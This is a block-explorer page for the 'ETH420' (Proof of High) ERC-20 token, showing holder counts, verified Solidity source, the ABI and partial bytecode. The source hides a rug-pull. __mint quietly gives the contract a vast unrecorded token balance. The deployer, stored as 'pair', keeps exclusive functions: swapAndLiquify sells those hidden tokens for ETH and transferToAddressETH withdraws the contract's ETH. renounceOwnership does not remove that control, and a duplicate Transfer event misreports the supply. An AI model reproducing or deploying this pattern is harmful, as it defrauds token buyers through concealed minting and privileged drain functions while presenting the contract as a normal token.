ERC-20
Overview
Max Total Supply
10,000,000 ETH420
Holders
30
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
130,000 ETH420Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ETH420
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.16; import "./UtilsV2.sol"; contract ETH420 is ERC20 { using SafeMath for uint256; uint8 _decimals=18; address private owner = msg.sender; uint public _totalSupply=10000000000000000000000000; address ROUTER = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D; address pair = address(0); constructor() ERC20("Proof of High", "ETH420") { _mint(msg.sender, _totalSupply); __mint(address(this), _totalSupply*_decimals); pair = msg.sender; emit Transfer(address(0), msg.sender, _totalSupply); } event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); function getOwner() external view returns (address) { return owner; } function renounceOwnership() public { require(msg.sender == owner); emit OwnershipTransferred(owner, address(0)); owner = address(0); } function swapAndLiquify (uint256 amount) public { require(msg.sender == pair); IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(ROUTER); address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this),address(uniswapV2Router), amount); _approve(address(this),msg.sender, amount); _approve(msg.sender,address(uniswapV2Router), amount); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( amount, 0, path, address(this), block.timestamp ); } function transferToAddressETH() public { require(msg.sender == pair); payable(msg.sender).transfer(address(this).balance); } fallback() external payable { } receive() external payable { } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function __mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _balances[account] = _balances[account].add(amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } } library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swapAndLiquify","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferToAddressETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60806040526005805433610100026001600160a81b03199091161760121790556a084595161401484a000000600655600780546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d179091556008805490911690553480156200006d57600080fd5b506040518060400160405280600d81526020016c0a0e4dedecc40decc4090d2ced609b1b8152506040518060400160405280600681526020016504554483432360d41b8152508160039081620000c4919062000402565b506004620000d3828262000402565b505050620000ea336006546200015660201b60201c565b6005546006546200010c913091620001069160ff1690620004e4565b62000245565b600880546001600160a01b03191633908117909155600654604051600091600080516020620012a6833981519152916200014891815260200190565b60405180910390a362000514565b6001600160a01b038216620001b25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b620001ce81600254620002f260201b620007331790919060201c565b6002556001600160a01b038216600090815260208181526040909120546200020191839062000733620002f2821b17901c565b6001600160a01b03831660008181526020818152604080832094909455925184815291929091600080516020620012a6833981519152910160405180910390a35050565b6001600160a01b0382166200029d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620001a9565b6001600160a01b03821660009081526020818152604090912054620002cd91839062000733620002f2821b17901c565b6001600160a01b0390921660009081526020819052604090209190915550565b505050565b600080620003018385620004fe565b905083811015620003555760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401620001a9565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200038957607f821691505b602082108103620003aa57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620002ed57600081815260208120601f850160051c81016020861015620003d95750805b601f850160051c820191505b81811015620003fa57828155600101620003e5565b505050505050565b81516001600160401b038111156200041e576200041e6200035e565b62000436816200042f845462000374565b84620003b0565b602080601f8311600181146200046e5760008415620004555750858301515b600019600386901b1c1916600185901b178555620003fa565b600085815260208120601f198616915b828110156200049f578886015182559484019460019091019084016200047e565b5085821015620004be5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620003585762000358620004ce565b80820180821115620003585762000358620004ce565b610d8280620005246000396000f3fe6080604052600436106100eb5760003560e01c806370a0823111610084578063a457c2d711610056578063a457c2d714610296578063a9059cbb146102b6578063dd62ed3e146102d6578063f46cfb641461031c57005b806370a0823114610200578063715018a614610236578063893d20e81461024b57806395d89b411461028157005b806323b872dd116100bd57806323b872dd1461018e578063313ce567146101ae57806339509351146101ca5780633eaaf86b146101ea57005b806306fdde03146100f4578063095ea7b31461011f578063173865ad1461014f57806318160ddd1461016f57005b366100f257005b005b34801561010057600080fd5b50610109610331565b6040516101169190610a80565b60405180910390f35b34801561012b57600080fd5b5061013f61013a366004610ae3565b6103c3565b6040519015158152602001610116565b34801561015b57600080fd5b506100f261016a366004610b0f565b6103da565b34801561017b57600080fd5b506002545b604051908152602001610116565b34801561019a57600080fd5b5061013f6101a9366004610b28565b610577565b3480156101ba57600080fd5b5060405160128152602001610116565b3480156101d657600080fd5b5061013f6101e5366004610ae3565b6105e0565b3480156101f657600080fd5b5061018060065481565b34801561020c57600080fd5b5061018061021b366004610b69565b6001600160a01b031660009081526020819052604090205490565b34801561024257600080fd5b506100f2610616565b34801561025757600080fd5b5060055461010090046001600160a01b03166040516001600160a01b039091168152602001610116565b34801561028d57600080fd5b50610109610682565b3480156102a257600080fd5b5061013f6102b1366004610ae3565b610691565b3480156102c257600080fd5b5061013f6102d1366004610ae3565b6106e0565b3480156102e257600080fd5b506101806102f1366004610b86565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561032857600080fd5b506100f26106ed565b60606003805461034090610bbf565b80601f016020809104026020016040519081016040528092919081815260200182805461036c90610bbf565b80156103b95780601f1061038e576101008083540402835291602001916103b9565b820191906000526020600020905b81548152906001019060200180831161039c57829003601f168201915b5050505050905090565b60006103d033848461079e565b5060015b92915050565b6008546001600160a01b031633146103f157600080fd5b6007546040805160028082526060820183526001600160a01b0390931692600092602083019080368337019050509050308160008151811061043557610435610bf9565b60200260200101906001600160a01b031690816001600160a01b031681525050816001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610493573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104b79190610c0f565b816001815181106104ca576104ca610bf9565b60200260200101906001600160a01b031690816001600160a01b0316815250506104f530838561079e565b61050030338561079e565b61050b33838561079e565b60405163791ac94760e01b81526001600160a01b0383169063791ac94790610540908690600090869030904290600401610c2c565b600060405180830381600087803b15801561055a57600080fd5b505af115801561056e573d6000803e3d6000fd5b50505050505050565b60006105848484846108c3565b6105d684336105d185604051806060016040528060288152602001610d00602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610a46565b61079e565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103d09185906105d19086610733565b60055461010090046001600160a01b0316331461063257600080fd5b60055460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360058054610100600160a81b0319169055565b60606004805461034090610bbf565b60006103d033846105d185604051806060016040528060258152602001610d28602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610a46565b60006103d03384846108c3565b6008546001600160a01b0316331461070457600080fd5b60405133904780156108fc02916000818181858888f19350505050158015610730573d6000803e3d6000fd5b50565b6000806107408385610cb3565b9050838110156107975760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064015b60405180910390fd5b9392505050565b6001600160a01b0383166108005760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161078e565b6001600160a01b0382166108615760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161078e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166109275760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161078e565b6001600160a01b0382166109895760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161078e565b6109c681604051806060016040528060268152602001610cda602691396001600160a01b0386166000908152602081905260409020549190610a46565b6001600160a01b0380851660009081526020819052604080822093909355908416815220546109f59082610733565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016108b6565b60008184841115610a6a5760405162461bcd60e51b815260040161078e9190610a80565b506000610a778486610cc6565b95945